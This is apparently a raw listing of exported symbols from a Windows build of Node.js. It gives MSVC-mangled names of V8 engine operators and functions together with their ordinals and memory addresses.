                                                                                                                                                                                                        ??4WasmValueObject@debug@v8@@QEAAAEAV012@$$QEAV012@@Z23260x140078ac0
                                                                                                                                                                                                        ??4WasmValueObject@debug@v8@@QEAAAEAV012@AEBV012@@Z23270x140078ac0
                                                                                                                                                                                                        ??4WriteBarrier@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z23280x140078ac0
                                                                                                                                                                                                        ??4WriteBarrier@internal@cppgc@@QEAAAEAV012@AEBV012@@Z23290x140078ac0
                                                                                                                                                                                                        ??4WriteBarrier@internal@v8@@QEAAAEAV012@$$QEAV012@@Z23300x140078ac0
                                                                                                                                                                                                        ??4WriteBarrier@internal@v8@@QEAAAEAV012@AEBV012@@Z23310x140078ac0
                                                                                                                                                                                                        ??4WriteBarrierTypeForNonCagedHeapPolicy@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z23320x140078ac0
                                                                                                                                                                                                        ??4WriteBarrierTypeForNonCagedHeapPolicy@internal@cppgc@@QEAAAEAV012@AEBV012@@Z23330x140078ac0
                                                                                                                                                                                                        ??4iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z23340x14047f750
                                                                                                                                                                                                        ??4iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@AEBV01234@@Z23350x140079a50
                                                                                                                                                                                                        ??4iterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z23360x140ed3560
                                                                                                                                                                                                        ??4iterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z23370x140ed3620
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@F@Z23380x140475990
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z23390x1400f0240
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z23400x1400f0420
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z23410x140475b40
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@J@Z23420x14047f780
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z23430x14016e4b0
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z23440x14047f960
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@N@Z23450x14016e690
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@O@Z23460x14047fb40
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z23470x14047fd20
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV?$basic_ios@DU?$char_traits@D@std@@@1@AEAV21@@Z@Z23480x14047fd30
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z23490x14047fd30
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z23500x14047fd50
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@PEBX@Z23510x14047ffb0
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z23520x14016e880
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z23530x1400f0600
                                                                                                                                                                                                        ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z23540x140480190
                                                                                                                                                                                                        ??6base@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVTime@01@@Z23550x140e62240
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUAsRPO@012@@Z23560x140f60280
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUConstFieldInfo@012@@Z23570x140f4a8f0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUElementAccess@012@@Z23580x140f4a950
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUFeedbackSource@012@@Z23590x140f51d50
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUFieldAccess@012@@Z23600x140f4aa60
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUGraphAsJSON@012@@Z23610x140f60b40
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBUObjectAccess@012@@Z23620x140f4ac50
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBV?$TinyRef@VScopeInfo@internal@v8@@@012@@Z23630x140f39b20
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVCheckMinusZeroParameters@012@@Z23640x140f4aca0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVContextAccess@012@@Z23650x140f39b90
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVFastApiCallParameters@012@@Z23660x140f4ad00
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVIfValueParameters@012@@Z23670x140eb1b40
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVInstructionSequence@012@@Z23680x140ea55e0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVJSWasmCallParameters@012@@Z23690x140f39bf0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVMoveOperands@012@@Z23700x140ea5c00
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVNumberOperationParameters@012@@Z23710x140f4b0e0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVOperator@012@@Z23720x140f38450
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVPropertyAccess@012@@Z23730x140f39c50
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVRpoNumber@012@@Z23740x140ea5c80
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVS128ImmediateParameter@012@@Z23750x140ec9d20
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVSchedule@012@@Z23760x140ee1330
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVSpeculativeBigIntAsUintNParameters@012@@Z23770x140f4b120
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4AddressingMode@012@@Z23780x140ea5c90
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ArchOpcode@012@@Z23790x140ea5e50
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4FlagsCondition@012@@Z23800x140ea85b0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4FlagsMode@012@@Z23810x140ea87d0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4Kind@CallDescriptor@012@@Z23820x140eaa970
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@UBranchOperatorInfo@012@@Z23830x140eb1ef0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@ULoadLaneParameters@012@@Z23840x140ec9f10
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@ULoadTransformParameters@012@@Z23850x140ec9fc0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@UStoreLaneParameters@012@@Z23860x140eca050
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VAllocateParameters@012@@Z23870x140f4b150
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VStackSlotRepresentation@012@@Z23880x140eca100
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VStoreRepresentation@012@@Z23890x140eca130
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@VType@012@@Z23900x140e9f8f0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4BigIntOperationHint@012@@Z23910x140f4b190
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4BranchHint@012@@Z23920x140eb1fa0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4CheckForMinusZeroMode@012@@Z23930x140f4b1c0
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4CheckTaggedInputMode@012@@Z23940x140f4b200
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4IsSafetyCheck@012@@Z23950x140eb2000
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4LoadTransformation@012@@Z23960x140eca210
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4MemoryAccessKind@012@@Z23970x140eca340
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4NumberOperationHint@012@@Z23980x140f4b260
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4ShiftKind@012@@Z23990x140eca390
                                                                                                                                                                                                        ??6compiler@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@W4Value@IrOpcode@012@@Z24000x141094ba0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsEscapedUC16ForJSON@01@@Z24010x1406b3b50
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsHex@01@@Z24020x1406b3c20
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUAsHexBytes@01@@Z24030x1406b3ca0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBUBrief@01@@Z24040x1407edd60
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVObject@01@@Z24050x1407ede10
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVRepresentation@01@@Z24060x1407ddcd0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBW4PropertyAttributes@01@@Z24070x1407ddd80
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VBytecodeOffset@01@@Z24080x1406b31c0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VExternalReference@01@@Z24090x140aa0870
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VFeedbackSlot@01@@Z24100x1406b31d0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VMachineType@01@@Z24110x140a82d50
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4DeoptimizeReason@01@@Z24120x140a563a0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FeedbackSlotKind@01@@Z24130x140878b70
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FunctionId@Runtime@01@@Z24140x1406dd1b0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4InstanceType@01@@Z24150x1407ede40
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4MachineRepresentation@01@@Z24160x140a82dd0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4PropertyCellType@01@@Z24170x1407ef0e0
                                                                                                                                                                                                        ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4PropertyConstness@01@@Z24180x1407dde20
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeNode@012@@Z24190x1408f9860
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeSourceInfo@012@@Z24200x1408f7710
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4Bytecode@012@@Z24210x1408f63d0
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ImplicitRegisterUse@012@@Z24220x1408f8be0
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandScale@012@@Z24230x1408f8c90
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandSize@012@@Z24240x1408f8cf0
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandType@012@@Z24250x1408f8d60
                                                                                                                                                                                                        ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ToBooleanMode@BytecodeArrayBuilder@012@@Z24260x1409190d0
                                                                                                                                                                                                        ??8?$MagicNumbersForDivision@I@base@v8@@QEBA_NAEBU012@@Z24270x140eb2060
                                                                                                                                                                                                        ??8?$MagicNumbersForDivision@_K@base@v8@@QEBA_NAEBU012@@Z24280x1410ee4e0
                                                                                                                                                                                                        ??8?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24290x1404bae70
                                                                                                                                                                                                        ??8?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z24300x1404bae70
                                                                                                                                                                                                        ??8?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z24310x1404bae70
                                                                                                                                                                                                        ??8BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24320x1408f9880
                                                                                                                                                                                                        ??8CallInterfaceDescriptor@internal@v8@@QEBA_NAEBV012@@Z24330x1404bae60
                                                                                                                                                                                                        ??8Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24340x140480370
                                                                                                                                                                                                        ??8TimeDelta@base@v8@@QEBA_NAEBV012@@Z24350x1404bae60
                                                                                                                                                                                                        ??8Type@compiler@internal@v8@@QEBA_NV0123@@Z24360x1404bae70
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBUConstFieldInfo@012@0@Z24370x1404bae60
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBUElementAccess@012@0@Z24380x140f4b460
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBUFieldAccess@012@0@Z24390x140f4b490
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBUObjectAccess@012@0@Z24400x140f4b4e0
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBVIfValueParameters@012@0@Z24410x140eb2060
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NAEBVS128ImmediateParameter@012@0@Z24420x140eca3e0
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NVStackSlotRepresentation@012@0@Z24430x140eca400
                                                                                                                                                                                                        ??8compiler@internal@v8@@YA_NVStoreRepresentation@012@0@Z24440x140eca420
                                                                                                                                                                                                        ??8internal@v8@@YA_NVExternalReference@01@0@Z24450x140aa08d0
                                                                                                                                                                                                        ??9?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24460x1404bae80
                                                                                                                                                                                                        ??9?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z24470x1404bae80
                                                                                                                                                                                                        ??9?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z24480x1404bae80
                                                                                                                                                                                                        ??9BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24490x1408f98d0
                                                                                                                                                                                                        ??9Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24500x140480380
                                                                                                                                                                                                        ??9TimeDelta@base@v8@@QEBA_NAEBV012@@Z24510x1408e4fb0
                                                                                                                                                                                                        ??9Type@compiler@internal@v8@@QEBA_NV0123@@Z24520x1404bae80
                                                                                                                                                                                                        ??9iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA_NAEBV01234@@Z24530x140913700
                                                                                                                                                                                                        ??9iterator@StateValuesAccess@compiler@internal@v8@@QEBA_NAEBV01234@@Z24540x140f56d30
                                                                                                                                                                                                        ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAPEAVMoveOperands@compiler@internal@v8@@_K@Z24550x1404bae90
                                                                                                                                                                                                        ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEBAAEBQEAVMoveOperands@compiler@internal@v8@@_K@Z24560x1404bae90
                                                                                                                                                                                                        ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptFrame@v8@@_K@Z24570x14007ba60
                                                                                                                                                                                                        ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptFrame@v8@@_K@Z24580x14007ba60
                                                                                                                                                                                                        ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptInfo@v8@@_K@Z24590x14007a7b0
                                                                                                                                                                                                        ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptInfo@v8@@_K@Z24600x14007a7b0
                                                                                                                                                                                                        ??AInputs@Node@compiler@internal@v8@@QEBAPEAV1234@H@Z24610x1404baea0
                                                                                                                                                                                                        ??AModificationScope@WasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@234@AEBUCacheKey@1234@@Z24620x14054f700
                                                                                                                                                                                                        ??AWasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@123@AEBUCacheKey@0123@@Z24630x14054f730
                                                                                                                                                                                                        ??DTimeDelta@base@v8@@QEBA?AV012@_J@Z24640x140e5f700
                                                                                                                                                                                                        ??DUtf8Value@String@v8@@QEAAPEADXZ24650x140078aa0
                                                                                                                                                                                                        ??DUtf8Value@String@v8@@QEBAPEBDXZ24660x140078aa0
                                                                                                                                                                                                        ??DValue@String@v8@@QEAAPEAGXZ24670x140078aa0
                                                                                                                                                                                                        ??DValue@String@v8@@QEBAPEBGXZ24680x140078aa0
                                                                                                                                                                                                        ??Diterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA?AUJumpTableTargetOffset@234@XZ24690x140913710
                                                                                                                                                                                                        ??Diterator@StateValuesAccess@compiler@internal@v8@@QEAA?AUTypedNode@1234@XZ24700x140f56d70
                                                                                                                                                                                                        ??EBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ24710x140913140
                                                                                                                                                                                                        ??Eiterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@XZ24720x140913730
                                                                                                                                                                                                        ??Eiterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@XZ24730x140f56e10
                                                                                                                                                                                                        ??FBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ24740x140913190
                                                                                                                                                                                                        ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z24750x140e5f710
                                                                                                                                                                                                        ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VThreadTicks@23@@Z24760x140e5f740
                                                                                                                                                                                                        ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z24770x140e5f710
                                                                                                                                                                                                        ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTime@23@@Z24780x140e5f740
                                                                                                                                                                                                        ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTimeTicks@23@@Z24790x140e5f740
                                                                                                                                                                                                        ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z24800x140e5f710
                                                                                                                                                                                                        ??GTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z24810x140e5f750
                                                                                                                                                                                                        ??GTimeDelta@base@v8@@QEBA?AV012@XZ24820x140e5f760
                                                                                                                                                                                                        ??H?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z24830x140e5f770
                                                                                                                                                                                                        ??H?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z24840x140e5f770
                                                                                                                                                                                                        ??H?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z24850x140e5f770
                                                                                                                                                                                                        ??HTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z24860x140e5f790
                                                                                                                                                                                                        ??KTimeDelta@base@v8@@QEBA?AV012@_J@Z24870x140e5f7a0
                                                                                                                                                                                                        ??KTimeDelta@base@v8@@QEBA_JAEBV012@@Z24880x140e5f7c0
                                                                                                                                                                                                        ??M?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24890x140e5f7d0
                                                                                                                                                                                                        ??M?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z24900x140e5f7d0
                                                                                                                                                                                                        ??M?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z24910x140e5f7d0
                                                                                                                                                                                                        ??MRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24920x140480390
                                                                                                                                                                                                        ??MTimeDelta@base@v8@@QEBA_NAEBV012@@Z24930x140e5f7e0
                                                                                                                                                                                                        ??N?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24940x140e5f7f0
                                                                                                                                                                                                        ??N?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z24950x140e5f7f0
                                                                                                                                                                                                        ??N?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z24960x140e5f7f0
                                                                                                                                                                                                        ??NRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24970x1404803a0
                                                                                                                                                                                                        ??NTimeDelta@base@v8@@QEBA_NAEBV012@@Z24980x140e5f800
                                                                                                                                                                                                        ??O?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24990x140e5f810
                                                                                                                                                                                                        ??O?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25000x140e5f810
                                                                                                                                                                                                        ??O?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25010x140e5f810
                                                                                                                                                                                                        ??ORegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25020x1404803b0
                                                                                                                                                                                                        ??OTimeDelta@base@v8@@QEBA_NAEBV012@@Z25030x140e5f820
                                                                                                                                                                                                        ??P?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25040x140e5f830
                                                                                                                                                                                                        ??P?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25050x140e5f830
                                                                                                                                                                                                        ??P?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25060x140e5f830
                                                                                                                                                                                                        ??PRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25070x1404803c0
                                                                                                                                                                                                        ??PTimeDelta@base@v8@@QEBA_NAEBV012@@Z25080x140e5f840
                                                                                                                                                                                                        ??RAstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEBA_NPEBVAstRawString@23@0@Z25090x1407b3210
                                                                                                                                                                                                        ??RDeleteACHHandle@node@@QEBAXPEAUACHHandle@1@@Z25100x140289850
                                                                                                                                                                                                        ??RImportAssertionsKeyComparer@internal@v8@@QEBA_NPEBVAstRawString@12@0@Z25110x1407b3210
                                                                                                                                                                                                        ??RModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEBA_NPEBVAstModuleRequest@123@0@Z25120x140afa7f0
                                                                                                                                                                                                        ??XTimeDelta@base@v8@@QEAAAEAV012@_J@Z25130x140e5f850
                                                                                                                                                                                                        ??Y?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z25140x140e5f860
                                                                                                                                                                                                        ??Y?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z25150x140e5f860
                                                                                                                                                                                                        ??Y?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z25160x140e5f860
